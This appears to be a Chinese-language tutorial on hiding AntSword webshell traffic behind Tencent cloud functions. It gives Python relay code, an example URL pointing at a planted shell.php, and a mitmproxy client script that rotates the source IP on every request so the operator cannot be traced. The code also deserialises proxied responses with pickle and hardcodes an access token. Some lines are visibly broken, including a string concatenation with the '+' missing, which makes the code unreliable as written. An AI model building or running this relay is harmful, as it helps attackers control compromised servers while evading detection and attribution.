云函数代理蚁剑流量
1.创建云函数
#!/usr/bin/env
# -*- coding:utf-8 -*-
import requests
import json
from urllib.parse import urlsplit
def geturl(urlstr):
jurlstr = json.dumps(urlstr)
dict_url = json.loads(jurlstr)
return dict_url['url']
def main_handler(event, context):
url = geturl(event['queryString'])
host = urlsplit(url).netloc
postdata = event['body']
headers = event['headers']
headers["HOST"] = host
resp = requests.post(url, data=postdata, headers=headers, verify=False)
response = {
"isBase64Encoded": False,
"statusCode": 200,
"headers": {'Content-Type': 'text/html;charset=' resp.apparent_encoding},
"body": resp.text
}
return response
使用时在webshell前加api访问路径。
https://service-ncowiper-xxxxxxx.apigw.tencentcs.com/release/helloworld-1637410382?url=https://www.baidu.com/shell.php
云函数HTTP代理
# -*- coding: utf8 -*-
import json
import pickle
from base64 import b64decode, b64encode
import requests
SCF_TOKEN = "INYZCKWDRHLGAFBQEXPTSMVUO"
def authorization():
return {
"isBase64Encoded": False,
"statusCode": 401,
"headers": {},
"body": "Please provide correct SCF-Token",
}
def main_handler(event: dict, context: dict):
# Tencent cloud has its own authorization system https://console.cloud.tencent.com/cam/capi
# But it may be a little overqualified for a simple usage like this
try:
token = event["headers"]["scf-token"]
except KeyError:
return authorization()
if token != SCF_TOKEN:
return authorization()
data = event["body"]
kwargs = json.loads(data)
kwargs['data'] = b64decode(kwargs['data'])
# Prohibit automatic redirect to avoid network errors such as connection reset
r = requests.request(**kwargs, verify=False, allow_redirects=False)
# TODO: REFACTOR NEEDED. Return response headers and body directly.
# There are many errors occured when setting headers to r.headers with some aujustments(https://cloud.tencent.com/document/product/583/12513).
# and the response `r.content`/`r.raw.read()` to body.(like gzip error)
serialized_resp = pickle.dumps(r)
return {
"isBase64Encoded": False,
"statusCode": 200,
"headers": {},
"body": b64encode(serialized_resp).decode("utf-8"),
}本地安装 mitmproxy
代码语言:javascript复制pip3 install mitmproxy
import json
import pickle
from typing import List
from random import choice
from urllib.parse import urlparse
from base64 import b64encode, b64decode
import mitmproxy
from mitmproxy.net.http import Headers
# API访问地址,可以添加多个,以逗号分隔
scf_servers: List[str] = ['https://service-xxxx.apigw.tencentcs.com/release/helloworld-1637412674']
# 授权Token,与云函数中的token配置一致
SCF_TOKEN = "INYZCKWDRHLGAFBQEXPTSMVUO"
def request(flow: mitmproxy.http.HTTPFlow):
scf_server = choice(scf_servers)
r = flow.request
data = {
"method": r.method,
"url": r.pretty_url,
"headers": dict(r.headers),
"cookies": dict(r.cookies),
"params": dict(r.query),
"data": b64encode(r.raw_content).decode("ascii"),
}
flow.request = flow.request.make(
"POST",
url=scf_server,
content=json.dumps(data),
headers={
"Accept": "text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, compress",
"Accept-Language": "en-us;q=0.8",
"Cache-Control": "max-age=0",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"Connection": "close",
"Host": urlparse(scf_server).netloc,
"SCF-Token": SCF_TOKEN,
},
)
def response(flow: mitmproxy.http.HTTPFlow):
if flow.response.status_code != 200:
mitmproxy.ctx.log.warn("Error")
if flow.response.status_code == 401:
flow.response.headers = Headers(content_type="text/html;charset=utf-8")
return
if flow.response.status_code == 433:
flow.response.headers = Headers(content_type="text/html;charset=utf-8")
flow.response.text = "<html><body>操作已超过云函数服务最大时间限制,可在函数配置中修改执行超时时间</body></html>"
return
if flow.response.status_code == 200:
body = flow.response.content.decode("utf-8")
resp = pickle.loads(b64decode(body))
r = flow.response.make(
status_code=resp.status_code,
headers=dict(resp.headers),
content=resp.content,
)
flow.response = r启动客户端
mitmdump -s client.py -p 8080
修改浏览器代理
添加mitmdump证书
选择证书导入 查看IP,每次刷新IP都会变化
